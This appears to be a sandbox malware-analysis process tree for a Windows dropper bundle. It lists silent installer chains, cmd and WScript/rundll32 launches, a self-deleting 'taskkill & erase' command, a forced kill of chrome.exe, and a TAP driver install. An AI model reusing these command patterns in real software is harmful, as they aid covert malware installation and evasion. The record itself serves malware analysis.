C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"3⤵PID:4464
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"3⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\is-LNHU8.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-LNHU8.tmp\LabPicV3.tmp" /SL5="$303A0,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"4⤵PID:5508
-
C:\Users\Admin\AppData\Local\Temp\is-LB3UH.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-LB3UH.tmp\ppppppfy.exe" /S /UID=lab2145⤵PID:1332
-
C:\Program Files\Mozilla Firefox\LRVQPAAZIS\prolab.exe"C:\Program Files\Mozilla Firefox\LRVQPAAZIS\prolab.exe" /VERYSILENT6⤵PID:1556
-
C:\Users\Admin\AppData\Local\Temp\is-61BJR.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-61BJR.tmp\prolab.tmp" /SL5="$5026A,575243,216576,C:\Program Files\Mozilla Firefox\LRVQPAAZIS\prolab.exe" /VERYSILENT7⤵PID:6032
-
-
-
C:\Users\Admin\AppData\Local\Temp\1b-80fad-ceb-cb7b7-59ce3ef892a28\Xyloqadibae.exe"C:\Users\Admin\AppData\Local\Temp\1b-80fad-ceb-cb7b7-59ce3ef892a28\Xyloqadibae.exe"6⤵PID:228
-
-
C:\Users\Admin\AppData\Local\Temp\21-73667-024-989b4-05c5ffa10737a\Wypaetewyny.exe"C:\Users\Admin\AppData\Local\Temp\21-73667-024-989b4-05c5ffa10737a\Wypaetewyny.exe"6⤵PID:4928
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m133nyfz.azz\md6_6ydj.exe & exit7⤵PID:5300
-
C:\Users\Admin\AppData\Local\Temp\m133nyfz.azz\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\m133nyfz.azz\md6_6ydj.exe8⤵PID:6404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1imxuq5z.rd4\askinstall31.exe & exit7⤵PID:6296
-
C:\Users\Admin\AppData\Local\Temp\1imxuq5z.rd4\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\1imxuq5z.rd4\askinstall31.exe8⤵PID:6652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vekdd2jm.uob\toolspab1.exe & exit7⤵PID:6592
-
C:\Users\Admin\AppData\Local\Temp\vekdd2jm.uob\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vekdd2jm.uob\toolspab1.exe8⤵PID:7300
-
C:\Users\Admin\AppData\Local\Temp\vekdd2jm.uob\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vekdd2jm.uob\toolspab1.exe9⤵PID:7316
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\2oG1o0Zhe2Ng.exe"3⤵PID:5888
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe4⤵PID:5868
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"3⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\IV707YO4NT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IV707YO4NT\multitimer.exe" 0 306065bb10421b26.04333812 0 1034⤵PID:4092
-
C:\Users\Admin\AppData\Local\Temp\IV707YO4NT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IV707YO4NT\multitimer.exe" 1 3.1617436215.60681e3780081 1035⤵PID:4652
-
C:\Users\Admin\AppData\Local\Temp\IV707YO4NT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\IV707YO4NT\multitimer.exe" 2 3.1617436215.60681e37800816⤵PID:5456
-
C:\Users\Admin\AppData\Local\Temp\l0phhlusxdr\zmxutypbaly.exe"C:\Users\Admin\AppData\Local\Temp\l0phhlusxdr\zmxutypbaly.exe" /ustwo INSTALL7⤵PID:6852
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "zmxutypbaly.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\l0phhlusxdr\zmxutypbaly.exe" & exit8⤵PID:6824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "zmxutypbaly.exe" /f9⤵
- Kills process with taskkill
PID:6636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4qmc4irlfje\vict.exe"C:\Users\Admin\AppData\Local\Temp\4qmc4irlfje\vict.exe" /VERYSILENT /id=5357⤵PID:5176
-
-
C:\Users\Admin\AppData\Local\Temp\tttp21d3mpj\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\tttp21d3mpj\cpyrix.exe" /VERYSILENT7⤵PID:4844
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe8⤵PID:7564
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"9⤵PID:7172
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub9⤵PID:7544
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe10⤵PID:6976
-
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe8⤵PID:7912
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"9⤵PID:6176
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\t2ndixrlhok\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\t2ndixrlhok\Setup3310.exe" /Verysilent /subid=5777⤵PID:7744
-
C:\Users\Admin\AppData\Local\Temp\is-I40LK.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I40LK.tmp\Setup3310.tmp" /SL5="$60334,138429,56832,C:\Users\Admin\AppData\Local\Temp\t2ndixrlhok\Setup3310.exe" /Verysilent /subid=5778⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\is-LK86P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LK86P.tmp\Setup.exe" /Verysilent9⤵PID:7784
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\svq3kpivv0p\app.exe"C:\Users\Admin\AppData\Local\Temp\svq3kpivv0p\app.exe" /8-237⤵PID:5696
-
-
C:\Users\Admin\AppData\Local\Temp\wigwpwmcl1e\vpn.exe"C:\Users\Admin\AppData\Local\Temp\wigwpwmcl1e\vpn.exe" /silent /subid=4827⤵PID:7324
-
C:\Users\Admin\AppData\Local\Temp\is-VH1JE.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-VH1JE.tmp\vpn.tmp" /SL5="$104F6,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wigwpwmcl1e\vpn.exe" /silent /subid=4828⤵PID:7508
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\KBEUNLR2PD\setups.exe"C:\Users\Admin\AppData\Local\Temp\KBEUNLR2PD\setups.exe" ll4⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\is-IA5A3.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-IA5A3.tmp\setups.tmp" /SL5="$4036E,635399,250368,C:\Users\Admin\AppData\Local\Temp\KBEUNLR2PD\setups.exe" ll5⤵PID:5196
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"3⤵PID:5264
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"3⤵PID:1680
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"4⤵PID:3116
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install5⤵PID:6112
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"3⤵PID:2300
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"4⤵PID:5060
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install5⤵PID:2548
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"3⤵PID:6140
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6132
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5328
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7DC2398D71026D14D111631D09288A88 C2⤵PID:2124
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 33F439479C973AC74B8AD42E28962CEC2⤵PID:4596
-
-
C:\Users\Admin\AppData\Local\Temp\is-O28MS.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-O28MS.tmp\lylal220.tmp" /SL5="$30334,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"1⤵PID:5496
-
C:\Users\Admin\AppData\Local\Temp\is-SP78A.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-SP78A.tmp\Microsoft.exe" /S /UID=lylal2202⤵PID:5400
-
C:\Program Files\Windows Multimedia Platform\PZPHDRGLZK\irecord.exe"C:\Program Files\Windows Multimedia Platform\PZPHDRGLZK\irecord.exe" /VERYSILENT3⤵PID:3088
-
C:\Users\Admin\AppData\Local\Temp\is-E8JLU.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-E8JLU.tmp\irecord.tmp" /SL5="$4031C,6265333,408064,C:\Program Files\Windows Multimedia Platform\PZPHDRGLZK\irecord.exe" /VERYSILENT4⤵PID:5964
-
-
-
C:\Users\Admin\AppData\Local\Temp\34-784a5-64b-bfcbd-c0c3c745c63da\Gutunotovo.exe"C:\Users\Admin\AppData\Local\Temp\34-784a5-64b-bfcbd-c0c3c745c63da\Gutunotovo.exe"3⤵PID:4484
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4hr3dw0s.5tb\md6_6ydj.exe & exit4⤵PID:5844
-
C:\Users\Admin\AppData\Local\Temp\4hr3dw0s.5tb\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\4hr3dw0s.5tb\md6_6ydj.exe5⤵PID:6416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4dskzag.ufj\askinstall31.exe & exit4⤵PID:6272
-
C:\Users\Admin\AppData\Local\Temp\q4dskzag.ufj\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\q4dskzag.ufj\askinstall31.exe5⤵PID:6676
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6748
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:7832
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vcg4k5ho.kz0\toolspab1.exe & exit4⤵PID:6524
-
C:\Users\Admin\AppData\Local\Temp\vcg4k5ho.kz0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vcg4k5ho.kz0\toolspab1.exe5⤵PID:5252
-
C:\Users\Admin\AppData\Local\Temp\vcg4k5ho.kz0\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\vcg4k5ho.kz0\toolspab1.exe6⤵PID:6940
-
-
-
-
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\1de7618ab9de492faf7dabb88b32bdc8 /t 5748 /p 61321⤵PID:5608
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4100
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\d64da0215e4840c48b3ece379546223d /t 888 /p 41001⤵PID:7036
-
C:\Users\Admin\AppData\Local\Temp\is-MA73S.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-MA73S.tmp\vict.tmp" /SL5="$50330,870426,780800,C:\Users\Admin\AppData\Local\Temp\4qmc4irlfje\vict.exe" /VERYSILENT /id=5351⤵PID:7224
-
C:\Users\Admin\AppData\Local\Temp\is-ON44T.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-ON44T.tmp\win1host.exe" 5352⤵PID:7876
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:8068
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7928
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7d64f659-5623-6e4c-8934-793df6f7f604}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8032
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"2⤵PID:6152
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7240
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6476
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:1720
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\389b6fd7ba7844d48e9e01dfc572584c /t 0 /p 72401⤵PID:7496
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:6132
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7824
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\327fb8c12b00497d9db1ec8c010a8d92 /t 7964 /p 61321⤵PID:584